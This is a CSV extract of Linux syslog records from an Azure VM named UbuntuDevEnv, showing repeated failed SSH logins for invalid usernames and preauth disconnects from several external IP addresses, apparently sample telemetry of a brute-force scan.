+4050,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:47:54,UbuntuDevEnv,2019-06-26 13:47:53,auth,UbuntuDevEnv,info,Invalid user user from 157.230.115.27 port 58396,130065,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,157.230.115.2,58396,,
+4051,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:47:54,UbuntuDevEnv,2019-06-26 13:47:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,130065,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4052,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:47:54,UbuntuDevEnv,2019-06-26 13:47:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,130065,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
+4053,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:47:56,UbuntuDevEnv,2019-06-26 13:47:55,auth,UbuntuDevEnv,info,Failed password for invalid user user from 157.230.115.27 port 58396 ssh2,130065,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,157.230.115.2,58396,,
+4054,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:47:56,UbuntuDevEnv,2019-06-26 13:47:55,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 58396:11: Bye Bye [preauth],130065,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,58396,,
+4055,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:47:56,UbuntuDevEnv,2019-06-26 13:47:55,auth,UbuntuDevEnv,info,Disconnected from invalid user user 157.230.115.27 port 58396 [preauth],130065,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,157.230.115.2,58396,,
+4056,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:48:12,UbuntuDevEnv,2019-06-26 13:48:11,auth,UbuntuDevEnv,info,Connection closed by 139.199.34.112 port 55496 [preauth],130124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.34.1,55496,,
+4057,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:48:26,UbuntuDevEnv,2019-06-26 13:48:25,auth,UbuntuDevEnv,info,Invalid user pian from 196.46.36.144 port 52891,130177,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pian,196.46.36.1,52891,,
+4058,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:48:26,UbuntuDevEnv,2019-06-26 13:48:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,130177,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4059,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:48:26,UbuntuDevEnv,2019-06-26 13:48:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144,130177,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.46.36.1,,0,
+4060,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:48:29,UbuntuDevEnv,2019-06-26 13:48:28,auth,UbuntuDevEnv,info,Failed password for invalid user pian from 196.46.36.144 port 52891 ssh2,130177,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pian,196.46.36.1,52891,,
+4061,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:48:29,UbuntuDevEnv,2019-06-26 13:48:28,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 52891:11: Bye Bye [preauth],130177,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,52891,,
+4062,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:48:29,UbuntuDevEnv,2019-06-26 13:48:28,auth,UbuntuDevEnv,info,Disconnected from invalid user pian 196.46.36.144 port 52891 [preauth],130177,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pian,196.46.36.1,52891,,
+4063,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:21,UbuntuDevEnv,2019-06-26 13:49:20,auth,UbuntuDevEnv,info,Connection closed by 5.196.23.14 port 45152 [preauth],130369,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.196.23.1,45152,,
+4064,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:22,UbuntuDevEnv,2019-06-26 13:49:21,auth,UbuntuDevEnv,info,Connection closed by 5.196.23.14 port 48006 [preauth],130375,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.196.23.1,48006,,
+4065,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:23,UbuntuDevEnv,2019-06-26 13:49:22,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 7005 [preauth],130384,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,7005,,
+4066,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:23,UbuntuDevEnv,2019-06-26 13:49:22,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 49108 [preauth],130389,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,49108,,
+4067,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:27,UbuntuDevEnv,2019-06-26 13:49:27,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 52248 [preauth],130401,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,52248,,
+4068,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:27,UbuntuDevEnv,2019-06-26 13:49:27,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 51603 [preauth],130404,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,51603,,
+4069,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:28,UbuntuDevEnv,2019-06-26 13:49:27,auth,UbuntuDevEnv,info,Connection closed by 5.196.23.14 port 54402 [preauth],130407,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.196.23.1,54402,,
+4070,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:28,UbuntuDevEnv,2019-06-26 13:49:28,auth,UbuntuDevEnv,info,Connection closed by 5.196.23.14 port 51688 [preauth],130400,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.196.23.1,51688,,
+4071,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:31,UbuntuDevEnv,2019-06-26 13:49:30,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 11922 [preauth],130420,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,11922,,
+4072,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:33,UbuntuDevEnv,2019-06-26 13:49:33,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 35196 [preauth],130432,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,35196,,
+4073,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:35,UbuntuDevEnv,2019-06-26 13:49:34,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 41074 [preauth],130439,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,41074,,
+4074,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:35,UbuntuDevEnv,2019-06-26 13:49:35,auth,UbuntuDevEnv,info,Connection closed by 5.196.23.14 port 32924 [preauth],130438,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.196.23.1,32924,,
+4075,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:35,UbuntuDevEnv,2019-06-26 13:49:35,auth,UbuntuDevEnv,info,Connection closed by 5.196.23.14 port 58144 [preauth],130434,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.196.23.1,58144,,
+4076,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:38,UbuntuDevEnv,2019-06-26 13:49:37,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 31444 [preauth],130458,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,31444,,
+4077,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:40,UbuntuDevEnv,2019-06-26 13:49:39,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 19853 [preauth],130468,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,19853,,
+4078,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:42,UbuntuDevEnv,2019-06-26 13:49:41,auth,UbuntuDevEnv,info,Connection closed by 5.196.23.14 port 39660 [preauth],130482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.196.23.1,39660,,
+4079,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:42,UbuntuDevEnv,2019-06-26 13:49:41,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 59848 [preauth],130477,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,59848,,
+4080,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:42,UbuntuDevEnv,2019-06-26 13:49:42,auth,UbuntuDevEnv,info,Connection closed by 5.196.23.14 port 36224 [preauth],130472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.196.23.1,36224,,
+4081,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:44,UbuntuDevEnv,2019-06-26 13:49:44,auth,UbuntuDevEnv,info,Invalid user taniac from 157.230.115.27 port 47524,130492,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,taniac,157.230.115.2,47524,,
+4082,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:44,UbuntuDevEnv,2019-06-26 13:49:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,130492,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4083,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:44,UbuntuDevEnv,2019-06-26 13:49:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,130492,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
+4084,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:45,UbuntuDevEnv,2019-06-26 13:49:44,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 54614 [preauth],130494,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,54614,,
+4085,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:46,UbuntuDevEnv,2019-06-26 13:49:46,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 55395 [preauth],130500,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,55395,,
+4086,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:47,UbuntuDevEnv,2019-06-26 13:49:46,auth,UbuntuDevEnv,info,Failed password for invalid user taniac from 157.230.115.27 port 47524 ssh2,130492,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,taniac,157.230.115.2,47524,,
+4087,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:47,UbuntuDevEnv,2019-06-26 13:49:46,auth,UbuntuDevEnv,info,Disconnected from invalid user taniac 157.230.115.27 port 47524 [preauth],130492,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,taniac,157.230.115.2,47524,,
+4088,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:47,UbuntuDevEnv,2019-06-26 13:49:46,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 47524:11: Bye Bye [preauth],130492,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,47524,,
+4089,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:48,UbuntuDevEnv,2019-06-26 13:49:47,auth,UbuntuDevEnv,info,Connection closed by 5.196.23.14 port 42632 [preauth],130504,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.196.23.1,42632,,
+4090,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:49,UbuntuDevEnv,2019-06-26 13:49:48,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 50787 [preauth],130512,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,50787,,
+4091,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:52,UbuntuDevEnv,2019-06-26 13:49:51,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 28740 [preauth],130520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,28740,,
+4092,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:53,UbuntuDevEnv,2019-06-26 13:49:53,auth,UbuntuDevEnv,info,Connection closed by 5.196.23.14 port 46310 [preauth],130536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.196.23.1,46310,,
+4093,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:53,UbuntuDevEnv,2019-06-26 13:49:53,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 31579 [preauth],130535,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,31579,,
+4094,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:55,UbuntuDevEnv,2019-06-26 13:49:54,auth,UbuntuDevEnv,info,Connection closed by 5.196.23.14 port 49010 [preauth],130539,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.196.23.1,49010,,
+4095,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:56,UbuntuDevEnv,2019-06-26 13:49:55,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 52117 [preauth],130545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,52117,,
+4096,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:49:58,UbuntuDevEnv,2019-06-26 13:49:58,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 33554 [preauth],130557,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,33554,,
+4097,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:00,UbuntuDevEnv,2019-06-26 13:50:00,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 50298 [preauth],130566,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,50298,,
+4098,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:01,UbuntuDevEnv,2019-06-26 13:50:00,auth,UbuntuDevEnv,info,Invalid user usr01 from 201.48.54.81 port 41277,130564,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,usr01,201.48.54.8,41277,,
+4099,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:01,UbuntuDevEnv,2019-06-26 13:50:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,130564,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+4100,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:01,UbuntuDevEnv,2019-06-26 13:50:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,130564,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4101,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:02,UbuntuDevEnv,2019-06-26 13:50:01,auth,UbuntuDevEnv,info,Connection closed by 5.196.23.14 port 52636 [preauth],130567,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.196.23.1,52636,,
+4102,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:02,UbuntuDevEnv,2019-06-26 13:50:01,auth,UbuntuDevEnv,info,Connection closed by 5.196.23.14 port 55460 [preauth],130569,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.196.23.1,55460,,
+4103,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:03,UbuntuDevEnv,2019-06-26 13:50:02,auth,UbuntuDevEnv,info,Failed password for invalid user usr01 from 201.48.54.81 port 41277 ssh2,130564,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,usr01,201.48.54.8,41277,,
+4104,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:03,UbuntuDevEnv,2019-06-26 13:50:02,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 53033 [preauth],130583,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,53033,,
+4105,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:03,UbuntuDevEnv,2019-06-26 13:50:02,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 41277:11: Bye Bye [preauth],130564,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,41277,,
+4106,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:03,UbuntuDevEnv,2019-06-26 13:50:02,auth,UbuntuDevEnv,info,Disconnected from invalid user usr01 201.48.54.81 port 41277 [preauth],130564,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,usr01,201.48.54.8,41277,,
+4107,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:05,UbuntuDevEnv,2019-06-26 13:50:05,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 6573 [preauth],130595,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,6573,,
+4108,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:07,UbuntuDevEnv,2019-06-26 13:50:07,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 59790 [preauth],130613,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,59790,,
+4109,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:07,UbuntuDevEnv,2019-06-26 13:50:07,auth,UbuntuDevEnv,info,Connection closed by 5.196.23.14 port 59002 [preauth],130612,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.196.23.1,59002,,
+4110,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:09,UbuntuDevEnv,2019-06-26 13:50:08,auth,UbuntuDevEnv,info,Connection closed by 5.196.23.14 port 33834 [preauth],130622,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.196.23.1,33834,,
